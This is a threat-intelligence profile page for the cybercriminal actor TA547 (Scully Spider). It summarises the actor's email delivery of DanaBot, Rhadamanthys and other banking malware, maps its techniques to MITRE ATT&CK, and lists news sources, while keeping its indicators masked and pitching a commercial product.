15 malware families

TA547

Also known asTA547

TA547 is a financially motivated cybercriminal threat actor, also referred to as Scully Spider in the provided content. The actor is described as prolific and is considered an initial access broker (IAB). TA547 has primarily distributed banking trojans and other malware via email campaigns, and has targeted multiple geographic regions, including Germany, Spain, Switzerland, Austria, the United States, and Australia. The actor often uses geofencing and has blacklisted VPN exit IP addresses, which can limit payload retrieval by region. The content states that TA547 has distributed banking malware including ZLoader, The Trick, Ursnif, Gootkit, Corebot, Panda Banker, Atmos, Mazar Bot, Red Alert Android malware, and DanaBot. Proofpoint observed TA547 delivering DanaBot in 2018, including campaigns targeting Australia, and notes that TA547 regularly distributed DanaBot using affiliate IDs 5 and 6. Separate reporting in the content says the gang tracked as TA547 and Scully Spider offered access to DanaBot for approximately $3,000 to $4,000 per month. The content also notes that from 2018 through 2020 DanaBot was delivered by TA547, TA571, and TA564. More recently, TA547 has used sophisticated banking malware, loaders, and information stealers. Since 2023, the actor has typically delivered NetSupport RAT, and has also delivered StealC and Lumma Stealer. In early 2024, TA547 was observed shifting from zipped JavaScript attachments to compressed LNK attachments. Proofpoint identified TA547 targeting German organizations with invoice-themed emails impersonating Metro and delivering Rhadamanthys. In that campaign, password-protected ZIP archives contained LNK files that launched PowerShell to fetch a remote script, decode a Base64-encoded Rhadamanthys payload, and execute it in memory as a .NET assembly. The content states this was the first observed TA547 use of Rhadamanthys, and elsewhere notes TA547 leveraged Rhadamanthys throughout 2024. The content further notes that researchers suspected TA547 used a PowerShell loader with comments consistent with AI-generated code in the Rhadamanthys delivery chain, although Proofpoint stated this did not alter the payload itself and did not change defensive detection approaches. The broader ecosystem reporting in the content also links RM3_boss's ISFB/Gozi-related ecosystem to TA547, alongside TA543, QQAAZZ, Evil Corp, and Dridex operations.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

MITRE ATT&CK

Tradecraft

22 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

8 of 15 tactics27 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0001

Initial Access

1 technique

T1566×2

Phishing

T1566.001

Spearphishing Attachment

T1566.002

Spearphishing Link

T1566.003

Spearphishing via Service

TA0002

Execution

2 techniques

T1059

Command and Scripting Interpreter

T1059.001×2

PowerShell

T1059.005

Visual Basic

T1059.007

JavaScript

T1204

User Execution

T1204.002×2

Malicious File

TA0005

Stealth

3 techniques

T1027

Obfuscated Files or Information

T1027.002

Software Packing

T1140

Deobfuscate/Decode Files or Information

T1620

Reflective Code Loading

TA0006

Credential Access

1 technique

T1056

Input Capture

T1056.003

Web Portal Capture

TA0007

Discovery

2 techniques

T1082

System Information Discovery

T1083

File and Directory Discovery

TA0009

Collection

3 techniques

T1056

Input Capture

T1056.003

Web Portal Capture

T1113

Screen Capture

T1560

Archive Collected Data

TA0011

Command and Control

3 techniques

T1071

Application Layer Protocol

T1071.001

Web Protocols

T1090

Proxy

T1105×2

Ingress Tool Transfer

TA0010

Exfiltration

1 technique

T1041×2

Exfiltration Over C2 Channel

ARSENAL

Associated malware families

15 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen

DanaBotProofpoint researchers discovered a new banking Trojan, dubbed “DanaBot”, targeting users in Australia via emails containing malicious URLs.3Jun 14, 2026

RhadamanthysRhadamanthys is a prominent malware observed since 2022, used by multiple cybercriminal threat actors. It is a modular information stealer with multiple pricing plans, and the creators sell it alongside Elysium Proxy Bot and a Crypt Service.3Apr 22, 2026

URSNIFDelivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.2Jun 14, 2026

ZLoaderDelivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.2Jun 14, 2026

AtmosDelivered malware included ZLoader (a.k.a. Terdot), Gootkit, Ursnif, Corebot, Panda Banker, Atmos, Mazar Bot, and Red Alert Android malware.1Jun 14, 2026

10 additional families tracked in Mallory.

IOCS

Observables

25 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

25 IOCsView more in app

Domains

10 total

••••••.com•••••••.ru••••••••.com•••••••••.net••••••••••.com•••••••••••.ru••••••••••••.com••••••.ru+2

hash.sha256

5 total

••••••••••••••••••••••••••••••••••••••••••••••••••

ip.v4

5 total

••••••••••••••••••••••••••••••••••••••••••••••••••

uri

5 total

••••••••••••••••••••••••••••••••••••••••••••••••••

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

9 SOURCESView more in app

proofpoint threat insight blogNews

Nov 12, 2025

Operation Endgame Quakes Rhadamanthys | Proofpoint US

Priority cybercriminal actor known for sophisticated banking malware and loaders; used Rhadamanthys throughout 2024.

proofpointNews

May 22, 2025

A Brief History of DanaBot, Longtime Ecrime Juggernaut Disrupted by Operation Endgame | Proofpoint US

Cybercriminal group that frequently distributed DanaBot in email campaigns from 2018 through 2020.

bank info securityNews

May 22, 2025

US Takes Down DanaBot Malware, Indicts Developers

Russian cybercrime group operating and monetizing the DanaBot malware via an affiliate/access model; also associated with a separate espionage-focused DanaBot variant used for intelligence collection and DDoS capability development.

bleeping computerNews

Oct 12, 2024

OpenAI confirms threat actors use ChatGPT to write malware

Suspected of using AI-written PowerShell loader code in a malware delivery chain culminating in Rhadamanthys infostealer.

+5 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping22

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal15

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables25

Domains, IPs, and hashes tied to this actor, refreshed continuously.